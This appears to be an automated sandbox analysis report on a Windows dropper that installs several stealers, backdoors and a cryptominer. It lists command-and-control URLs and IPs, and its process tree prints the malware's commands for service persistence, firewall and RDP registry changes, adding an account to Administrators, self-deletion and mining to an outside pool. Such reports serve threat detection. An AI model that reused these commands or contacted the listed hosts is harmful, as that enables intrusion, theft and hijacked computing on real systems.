Overview

overview

10

Static

static

dridex

windows10_x64

10

Analysis

  • max time kernel
    151s
  • max time network
    153s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    13-10-2021 12:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    38e72fcbf8f38717011e12623c232bd859a5dcc2b6a42f82d11a1649693e432a.exe

  • Size

    311KB

  • MD5

    ce5e05759483f6055bce5b8274808de2

  • SHA1

    f008ba62ef06097bb0894797f65dd5623553384f

  • SHA256

    38e72fcbf8f38717011e12623c232bd859a5dcc2b6a42f82d11a1649693e432a

  • SHA512

    2c7506e5023d7294a80e0e4a7d256b155e87d7648cf9517e0593d746a04deb271c8427862b21c1f8b844fb5d64a22c6cfe6bf6c70ab0fb634acb04a4718867fe

Score
10/10
raccoonredlineservhelpersmokeloadertofseevidarxmrig103327d80aa27e80cd2ef63c638e2752e24242d1b37c676b1a32c7d2ce2aba84e8823871900d67e000497ebf9b416b72a203df65383eec899dc689d2c3d7c8fdd015293e99dac71bc0cfc194d3ce612abf3efbe5e97e7d069407605ee9138022aa82166657e6megaproliv2w1backdoordiscoveryevasioninfostealerminerpersistencespywarestealersuricatathemidatrojan

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://honawey7.xyz/

http://wijibui0.xyz/

http://hefahei6.xyz/

http://pipevai4.xyz/

http://nalirou7.xyz/

http://xacokuo8.xyz/

http://hajezey1.xyz/

http://gejajoo7.xyz/

http://sysaheu9.xyz/

http://rixoxeu9.xyz/
rc4.i32
rc4.i32

Extracted

Family

tofsee

C2

defeatwax.ru

refabyd.info

Extracted

Family

raccoon

Version

1.8.2

Botnet

fbe5e97e7d069407605ee9138022aa82166657e6

Attributes
  • url4cnc

    http://telemirror.top/stevuitreen

    http://tgmirror.top/stevuitreen

    http://telegatt.top/stevuitreen

    http://telegka.top/stevuitreen

    http://telegin.top/stevuitreen

    https://t.me/stevuitreen

rc4.plain
rc4.plain

Extracted

Family

vidar

Version

41.3

Botnet

1033

C2

https://mas.to/@oleg98

Attributes
  • profile_id

    1033

Extracted

Family

raccoon

Version

1.8.2

Botnet

27d80aa27e80cd2ef63c638e2752e24242d1b37c

Attributes
  • url4cnc

    http://telemirror.top/ararius809b

    http://tgmirror.top/ararius809b

    http://telegatt.top/ararius809b

    http://telegka.top/ararius809b

    http://telegin.top/ararius809b

    https://t.me/ararius809b

rc4.plain
rc4.plain

Extracted

Family

raccoon

Version

1.8.2

Botnet

676b1a32c7d2ce2aba84e8823871900d67e00049

Attributes
  • url4cnc

    http://telemirror.top/kaba4ello

    http://tgmirror.top/kaba4ello

    http://telegatt.top/kaba4ello

    http://telegka.top/kaba4ello

    http://telegin.top/kaba4ello

    https://t.me/kaba4ello

rc4.plain
rc4.plain

Extracted

Family

redline

Botnet

w1

C2

109.234.34.165:12323

Extracted

Family

redline

Botnet

MegaProliv2

C2

93.115.20.139:28978

Extracted

Family

raccoon

Version

1.8.2

Botnet

c8fdd015293e99dac71bc0cfc194d3ce612abf3e

Attributes
  • url4cnc

    http://telemirror.top/rocketmanthem2

    http://tgmirror.top/rocketmanthem2

    http://telegatt.top/rocketmanthem2

    http://telegka.top/rocketmanthem2

    http://telegin.top/rocketmanthem2

    https://t.me/rocketmanthem2

rc4.plain
rc4.plain

Extracted

Family

raccoon

Botnet

7ebf9b416b72a203df65383eec899dc689d2c3d7

Attributes
  • url4cnc

    http://telegatt.top/agrybirdsgamerept

    http://telegka.top/agrybirdsgamerept

    http://telegin.top/agrybirdsgamerept

    https://t.me/agrybirdsgamerept

rc4.plain
rc4.plain

Signatures

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 4 IoCs
  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

    trojanbackdoorservhelper
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Windows security bypass 2 TTPs
    evasiontrojan
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • Vidar Stealer 2 IoCs
    stealer
  • XMRig Miner Payload 1 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Downloads MZ/PE file
  • Executes dropped EXE 17 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets DLL path for service in the registry 2 TTPs
    persistence
  • Sets service image path in registry 2 TTPs
    persistence
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 6 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
    evasiontrojan
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 8 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies data under HKEY_USERS 12 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\38e72fcbf8f38717011e12623c232bd859a5dcc2b6a42f82d11a1649693e432a.exe
    "C:\Users\Admin\AppData\Local\Temp\38e72fcbf8f38717011e12623c232bd859a5dcc2b6a42f82d11a1649693e432a.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2396
    • C:\Users\Admin\AppData\Local\Temp\38e72fcbf8f38717011e12623c232bd859a5dcc2b6a42f82d11a1649693e432a.exe
      "C:\Users\Admin\AppData\Local\Temp\38e72fcbf8f38717011e12623c232bd859a5dcc2b6a42f82d11a1649693e432a.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:1708
  • C:\Users\Admin\AppData\Local\Temp\FD7B.exe
    C:\Users\Admin\AppData\Local\Temp\FD7B.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3592
    • C:\Users\Admin\AppData\Local\Temp\FD7B.exe
      C:\Users\Admin\AppData\Local\Temp\FD7B.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:2284
  • C:\Users\Admin\AppData\Local\Temp\397.exe
    C:\Users\Admin\AppData\Local\Temp\397.exe
    1⤵
    • Executes dropped EXE
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of AdjustPrivilegeToken
    PID:1796
  • C:\Users\Admin\AppData\Local\Temp\AEB.exe
    C:\Users\Admin\AppData\Local\Temp\AEB.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:1124
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\rqojcyio\
      2⤵
        PID:1304
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\aqqqfwcu.exe" C:\Windows\SysWOW64\rqojcyio\
        2⤵
          PID:2324
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create rqojcyio binPath= "C:\Windows\SysWOW64\rqojcyio\aqqqfwcu.exe /d\"C:\Users\Admin\AppData\Local\Temp\AEB.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:1904
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description rqojcyio "wifi internet conection"
            2⤵
              PID:3644
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start rqojcyio
              2⤵
                PID:3104
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:3236
              • C:\Users\Admin\AppData\Local\Temp\1089.exe
                C:\Users\Admin\AppData\Local\Temp\1089.exe
                1⤵
                • Executes dropped EXE
                • Checks BIOS information in registry
                • Checks whether UAC is enabled
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of AdjustPrivilegeToken
                PID:960
              • C:\Users\Admin\AppData\Local\Temp\16E3.exe
                C:\Users\Admin\AppData\Local\Temp\16E3.exe
                1⤵
                • Executes dropped EXE
                PID:1172
              • C:\Users\Admin\AppData\Local\Temp\1B59.exe
                C:\Users\Admin\AppData\Local\Temp\1B59.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:4048
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /im 1B59.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1B59.exe" & del C:\ProgramData\*.dll & exit
                  2⤵
                    PID:2904
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /im 1B59.exe /f
                      3⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:932
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /t 6
                      3⤵
                      • Delays execution with timeout.exe
                      PID:2316
                • C:\Windows\SysWOW64\rqojcyio\aqqqfwcu.exe
                  C:\Windows\SysWOW64\rqojcyio\aqqqfwcu.exe /d"C:\Users\Admin\AppData\Local\Temp\AEB.exe"
                  1⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious use of WriteProcessMemory
                  PID:3792
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe
                    2⤵
                    • Drops file in System32 directory
                    • Suspicious use of SetThreadContext
                    • Modifies data under HKEY_USERS
                    PID:2756
                    • C:\Windows\SysWOW64\svchost.exe
                      svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2352
                • C:\Users\Admin\AppData\Local\Temp\25AB.exe
                  C:\Users\Admin\AppData\Local\Temp\25AB.exe
                  1⤵
                  • Executes dropped EXE
                  PID:3608
                • C:\Users\Admin\AppData\Local\Temp\2D5C.exe
                  C:\Users\Admin\AppData\Local\Temp\2D5C.exe
                  1⤵
                  • Executes dropped EXE
                  PID:4028
                • C:\Users\Admin\AppData\Local\Temp\3359.exe
                  C:\Users\Admin\AppData\Local\Temp\3359.exe
                  1⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3824
                • C:\Users\Admin\AppData\Local\Temp\5077.exe
                  C:\Users\Admin\AppData\Local\Temp\5077.exe
                  1⤵
                  • Executes dropped EXE
                  PID:1696
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
                    2⤵
                    • Drops file in System32 directory
                    • Drops file in Windows directory
                    PID:1220
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ashyc03y\ashyc03y.cmdline"
                      3⤵
                        PID:1036
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9084.tmp" "c:\Users\Admin\AppData\Local\Temp\ashyc03y\CSCB4C365F87433497092C1A4203997676.TMP"
                          4⤵
                            PID:3624
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                          3⤵
                            PID:2768
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                            3⤵
                              PID:1568
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                              3⤵
                                PID:1476
                                • C:\Windows\System32\Conhost.exe
                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  4⤵
                                    PID:2316
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
                                  3⤵
                                    PID:1640
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
                                    3⤵
                                    • Modifies registry key
                                    PID:4184
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
                                    3⤵
                                      PID:1124
                                    • C:\Windows\SysWOW64\net.exe
                                      "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                      3⤵
                                        PID:4268
                                        • C:\Windows\SysWOW64\net1.exe
                                          C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                          4⤵
                                            PID:3216
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                                          3⤵
                                            PID:4288
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /c net start rdpdr
                                              4⤵
                                                PID:2028
                                                • C:\Windows\SysWOW64\net.exe
                                                  net start rdpdr
                                                  5⤵
                                                    PID:1452
                                                    • C:\Windows\SysWOW64\net1.exe
                                                      C:\Windows\system32\net1 start rdpdr
                                                      6⤵
                                                        PID:4308
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                                                  3⤵
                                                    PID:2032
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /c net start TermService
                                                      4⤵
                                                        PID:4328
                                                        • C:\Windows\SysWOW64\net.exe
                                                          net start TermService
                                                          5⤵
                                                            PID:4336
                                                            • C:\Windows\SysWOW64\net1.exe
                                                              C:\Windows\system32\net1 start TermService
                                                              6⤵
                                                                PID:4352
                                                    • C:\Users\Admin\AppData\Local\Temp\53C3.exe
                                                      C:\Users\Admin\AppData\Local\Temp\53C3.exe
                                                      1⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      PID:3656
                                                      • C:\Users\Admin\AppData\Local\Temp\53C3.exe
                                                        C:\Users\Admin\AppData\Local\Temp\53C3.exe
                                                        2⤵
                                                        • Executes dropped EXE
                                                        PID:1920
                                                    • C:\Users\Admin\AppData\Local\Temp\5BE3.exe
                                                      C:\Users\Admin\AppData\Local\Temp\5BE3.exe
                                                      1⤵
                                                      • Executes dropped EXE
                                                      PID:4056
                                                    • C:\Users\Admin\AppData\Local\Temp\64AE.exe
                                                      C:\Users\Admin\AppData\Local\Temp\64AE.exe
                                                      1⤵
                                                      • Executes dropped EXE
                                                      PID:3052
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 956
                                                        2⤵
                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                        • Program crash
                                                        PID:2216
                                                    • C:\Users\Admin\AppData\Local\Temp\6AE8.exe
                                                      C:\Users\Admin\AppData\Local\Temp\6AE8.exe
                                                      1⤵
                                                      • Executes dropped EXE
                                                      PID:1052
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1052 -s 340
                                                        2⤵
                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                        • Program crash
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3848

                                                    Network

                                                    MITRE ATT&CK Enterprise v6

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • memory/960-158-0x0000000077D50000-0x0000000077EDE000-memory.dmp

                                                      Filesize

                                                      1.6MB

                                                      Download

                                                    • memory/960-227-0x0000000007030000-0x0000000007031000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/960-218-0x0000000007390000-0x0000000007391000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/960-251-0x00000000078E0000-0x00000000078E1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/960-246-0x0000000008970000-0x0000000008971000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/960-226-0x0000000006F10000-0x0000000006F11000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/960-221-0x0000000006AF0000-0x0000000006AF1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/960-151-0x00000000013E0000-0x00000000013E1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/960-228-0x0000000006F90000-0x0000000006F91000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/960-160-0x0000000003520000-0x0000000003521000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1124-162-0x0000000000400000-0x00000000016C0000-memory.dmp

                                                      Filesize

                                                      18.8MB

                                                      Download

                                                    • memory/1124-159-0x00000000016C0000-0x000000000180A000-memory.dmp

                                                      Filesize

                                                      1.3MB

                                                      Download

                                                    • memory/1124-141-0x0000000001956000-0x0000000001967000-memory.dmp

                                                      Filesize

                                                      68KB

                                                      Download

                                                    • memory/1172-180-0x0000000003340000-0x00000000033CE000-memory.dmp

                                                      Filesize

                                                      568KB

                                                      Download

                                                    • memory/1172-166-0x0000000001976000-0x00000000019C5000-memory.dmp

                                                      Filesize

                                                      316KB

                                                      Download

                                                    • memory/1172-181-0x0000000000400000-0x0000000001708000-memory.dmp

                                                      Filesize

                                                      19.0MB

                                                      Download

                                                    • memory/1220-327-0x0000000006A92000-0x0000000006A93000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1220-326-0x0000000006A90000-0x0000000006A91000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1220-347-0x0000000006A93000-0x0000000006A94000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1476-896-0x0000000004DE2000-0x0000000004DE3000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1476-895-0x0000000004DE0000-0x0000000004DE1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1476-910-0x000000007E610000-0x000000007E611000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1568-639-0x0000000004EB2000-0x0000000004EB3000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1568-638-0x0000000004EB0000-0x0000000004EB1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1568-660-0x000000007F430000-0x000000007F431000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1696-272-0x00000000056A4000-0x00000000056A5000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1696-234-0x0000000000C15000-0x000000000101B000-memory.dmp

                                                      Filesize

                                                      4.0MB

                                                      Download

                                                    • memory/1696-271-0x0000000001020000-0x0000000001422000-memory.dmp

                                                      Filesize

                                                      4.0MB

                                                      Download

                                                    • memory/1696-280-0x00000000056A2000-0x00000000056A3000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1696-284-0x00000000056A3000-0x00000000056A4000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1696-274-0x00000000056A0000-0x00000000056A1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1696-273-0x0000000000400000-0x0000000000841000-memory.dmp

                                                      Filesize

                                                      4.3MB

                                                      Download

                                                    • memory/1696-263-0x0000000005AC0000-0x0000000005EBF000-memory.dmp

                                                      Filesize

                                                      4.0MB

                                                      Download

                                                    • memory/1708-116-0x0000000000400000-0x0000000000409000-memory.dmp

                                                      Filesize

                                                      36KB

                                                      Download

                                                    • memory/1796-140-0x0000000005560000-0x0000000005561000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1796-142-0x0000000005720000-0x0000000005721000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1796-143-0x00000000055C0000-0x00000000055C1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1796-144-0x0000000005A00000-0x0000000005A01000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1796-145-0x0000000005650000-0x0000000005651000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1796-146-0x0000000005600000-0x0000000005601000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1796-133-0x0000000077D50000-0x0000000077EDE000-memory.dmp

                                                      Filesize

                                                      1.6MB

                                                      Download

                                                    • memory/1796-134-0x0000000000300000-0x0000000000301000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1796-139-0x0000000005C20000-0x0000000005C21000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/1920-286-0x0000000004FE0000-0x00000000055E6000-memory.dmp

                                                      Filesize

                                                      6.0MB

                                                      Download

                                                    • memory/1920-253-0x0000000000400000-0x0000000000422000-memory.dmp

                                                      Filesize

                                                      136KB

                                                      Download

                                                    • memory/2396-118-0x00000000001D0000-0x00000000001D9000-memory.dmp

                                                      Filesize

                                                      36KB

                                                      Download

                                                    • memory/2396-115-0x0000000001866000-0x0000000001876000-memory.dmp

                                                      Filesize

                                                      64KB

                                                      Download

                                                    • memory/2756-187-0x0000000000760000-0x0000000000775000-memory.dmp

                                                      Filesize

                                                      84KB

                                                      Download

                                                    • memory/2756-189-0x0000000000670000-0x0000000000671000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/2756-191-0x0000000000670000-0x0000000000671000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/2768-382-0x0000000006CC0000-0x0000000006CC1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/2768-383-0x0000000006CC2000-0x0000000006CC3000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/2768-417-0x000000007F5D0000-0x000000007F5D1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/3028-119-0x0000000000ED0000-0x0000000000EE6000-memory.dmp

                                                      Filesize

                                                      88KB

                                                      Download

                                                    • memory/3028-175-0x0000000003190000-0x00000000031A6000-memory.dmp

                                                      Filesize

                                                      88KB

                                                      Download

                                                    • memory/3052-265-0x0000000001996000-0x00000000019E5000-memory.dmp

                                                      Filesize

                                                      316KB

                                                      Download

                                                    • memory/3052-302-0x0000000001890000-0x000000000191E000-memory.dmp

                                                      Filesize

                                                      568KB

                                                      Download

                                                    • memory/3052-303-0x0000000000400000-0x00000000016FF000-memory.dmp

                                                      Filesize

                                                      19.0MB

                                                      Download

                                                    • memory/3592-132-0x00000000016C0000-0x000000000176E000-memory.dmp

                                                      Filesize

                                                      696KB

                                                      Download

                                                    • memory/3608-208-0x0000000006A80000-0x000000000B2DB000-memory.dmp

                                                      Filesize

                                                      72.4MB

                                                      Download

                                                    • memory/3608-209-0x0000000000400000-0x0000000004CBB000-memory.dmp

                                                      Filesize

                                                      72.7MB

                                                      Download

                                                    • memory/3656-244-0x0000000004AC0000-0x0000000004AC1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/3656-238-0x0000000000080000-0x0000000000081000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/3792-178-0x00000000018F1000-0x0000000001901000-memory.dmp

                                                      Filesize

                                                      64KB

                                                      Download

                                                    • memory/3792-195-0x0000000000400000-0x00000000016C0000-memory.dmp

                                                      Filesize

                                                      18.8MB

                                                      Download

                                                    • memory/3792-194-0x0000000001790000-0x00000000018DA000-memory.dmp

                                                      Filesize

                                                      1.3MB

                                                      Download

                                                    • memory/3824-222-0x0000000002810000-0x0000000002811000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/3824-210-0x0000000002560000-0x000000000257C000-memory.dmp

                                                      Filesize

                                                      112KB

                                                      Download

                                                    • memory/3824-203-0x0000000002430000-0x0000000002461000-memory.dmp

                                                      Filesize

                                                      196KB

                                                      Download

                                                    • memory/3824-225-0x0000000002814000-0x0000000002815000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/3824-224-0x0000000002813000-0x0000000002814000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/3824-223-0x0000000002812000-0x0000000002813000-memory.dmp

                                                      Filesize

                                                      4KB

                                                      Download

                                                    • memory/4028-196-0x00000000025A0000-0x0000000002631000-memory.dmp

                                                      Filesize

                                                      580KB

                                                      Download

                                                    • memory/4048-186-0x0000000000400000-0x0000000001735000-memory.dmp

                                                      Filesize

                                                      19.2MB

                                                      Download

                                                    • memory/4048-173-0x00000000017A6000-0x0000000001823000-memory.dmp

                                                      Filesize

                                                      500KB

                                                      Download

                                                    • memory/4048-185-0x0000000003360000-0x0000000003436000-memory.dmp

                                                      Filesize

                                                      856KB

                                                      Download

                                                    • memory/4056-278-0x0000000000400000-0x00000000016FF000-memory.dmp

                                                      Filesize

                                                      19.0MB

                                                      Download

                                                    • memory/4056-288-0x0000000003260000-0x00000000032EE000-memory.dmp

                                                      Filesize

                                                      568KB

                                                      Download

                                                    • memory/4056-250-0x00000000018D6000-0x0000000001925000-memory.dmp

                                                      Filesize

                                                      316KB

                                                      Download